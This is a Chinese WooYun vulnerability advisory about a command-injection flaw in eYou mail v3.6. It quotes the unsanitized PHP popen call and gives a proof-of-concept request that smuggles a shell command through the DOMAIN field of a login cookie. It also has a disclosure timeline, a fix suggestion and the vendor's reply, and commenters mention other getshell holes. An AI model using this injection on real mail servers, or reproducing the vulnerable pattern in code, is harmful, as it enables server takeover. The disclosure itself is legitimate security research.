当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027523

漏洞标题:eYou邮箱系统v3.6命令执行漏洞

相关厂商:北京亿中邮信息技术有限公司

漏洞作者: YwiSax

提交时间:2013-07-03 08:37

修复时间:2013-10-01 08:38

公开时间:2013-10-01 08:38

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-03: 细节已通知厂商并且等待厂商处理中
2013-07-03: 厂商已经确认,细节仅向厂商公开
2013-07-06: 细节向第三方安全合作伙伴开放
2013-08-27: 细节向核心白帽子及相关领域专家公开
2013-09-06: 细节向普通白帽子公开
2013-09-16: 细节向实习白帽子公开
2013-10-01: 细节向公众公开

简要描述:

我早些时间已经把这个提交给eYou官方了,今天看了下,eYou没有要修复的意思啊。。。看来eYou是打算直接放弃旧版用户了?
==================================
有条件限制,需要登陆权限,新版本无效,还是命令执行。问题出在getUserDir这个函数里,$_COOKIE毫无过滤带入。

详细说明:

先看eYou的代码:

//获取用户目录
function getUserDir($uid, $domain) {
    $handle = popen("/var/eyou/sbin/hashid $uid $domain", 'r');
    $read = fread($handle, 2096);
    pclose($handle);
    return $read;
}


$domain无过滤,直接可以执行。
接着是利用代码,没有现成的哈,自己看着来改就行了。

public function action_test()
{
	$cmd = "ls>t.txt";
	$request = Request::factory('http://mail.XXXXXXXXXXXX.cn/user/autoComplete.php?s=1')
	->cookie('USER', "LASTONE=fake&ENTER_TYPE=0&NO_EYCM=1&GWJUMP=1&MAXRCPTNUM=150&LANG=zh_CN&TOKEN=z2GYCv1SJ&DOMAIN=test.com;{$cmd}&UID=test&LOGIN_DOMAIN=test.com&LOGIN_UID=timothy&ATTSIZE=10&CALLBACK=0&TRACEMAIL=0&GROUPADDR=0&VIEWLIST=0&GLOBALPERMISSION=0&NOTATION=0&BYTESPERCENT=0&BOOKMARK=1&MOBILEMESSAGE=0&DIALUP=0&VIDEOMAIL=0&SECUREMAIL=0&VOICEMAIL=1&CALENDAR=1&STORAGE=1&TOTALSPACE=200&LOCKSTATUS=0&USERNAME=&EXPTIME=0&LETTERS=5000&QUOTA=100&COMPANYADDR=&SKIN=current&")
	->cookie('PHPSESSID', 'e1c8798afec734384cd908180e52b1cf')
	->execute();
	echo Debug::vars($request);
	exit;
}

漏洞证明:

= = 不上图了啊,不敢再拿学校来当目标了,容易被误会。

修复方案:

在getUserDir方法中用正则验证下domain。

版权声明:转载请注明来源 YwiSax@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-07-03 15:56

厂商回复:

非常感谢提供,该版本是公司10年以前的老版本,公司会尽快处理并建议用户升级。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-03 09:04 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    看你的描述还是比较鸡肋的,还有一处命令执行不需要登录

  2. 2013-07-03 09:15 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @saline 不发?

  3. 2013-07-03 09:42 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    这个太弱了,哈哈.好多处直接getshell,免登录!

  4. 2013-07-03 10:18 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    @conqu3r @saline 旧版本还是新版本的?旧版本的确十分多处可以getshell不过或多或少有限制条件。。。各位继续dig eYou。我对eYou无爱了,以后转战anymacro。

  5. 2013-07-03 10:26 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    @YwiSax 表示是旧版本,真心的.新版本完全没得辙啊...而且也没源码,求源码一份撒!

  6. 2013-07-03 10:29 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    @conqu3r = = 哎哎,的确,新版本没发现大问题,目前只发现一些越权的小洞洞。剩下的丘丘聊?

  7. 2013-07-03 10:52 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    @YwiSax yep,丘丘私信给我撒.

  8. 2013-07-03 21:56 | pangshenjie ( 普通白帽子 | Rank:110 漏洞数:14 )

    @conqu3r 新版貌似也有问题,哈哈,不过小范围流通了

  9. 2013-07-03 22:24 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    @pangshenjie really,看来你知道细节,丘丘细聊!

  10. 2013-07-04 09:34 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    呀呀 要不弄个闭源源码共享群神马的~

  11. 2013-07-23 20:17 | darksn0w ( 实习白帽子 | Rank:62 漏洞数:10 | 无折腾,不生活!)

    @pangshenjie 2货琴心

  12. 2013-07-23 20:34 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @saline 大牛啊,球带

  13. 2013-10-01 11:07 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    @YwiSax 安宁代码加密了。。。。

  14. 2013-12-12 13:13 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    @YwiSax 好像早些时候在手机网站黑客契约见过你。

  15. 2013-12-12 13:55 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    @s3xy good job.

  16. 2014-04-12 14:27 | 幽灵 ( 路人 | Rank:22 漏洞数:6 | 一步一步)

    @conqu3r 求方法。。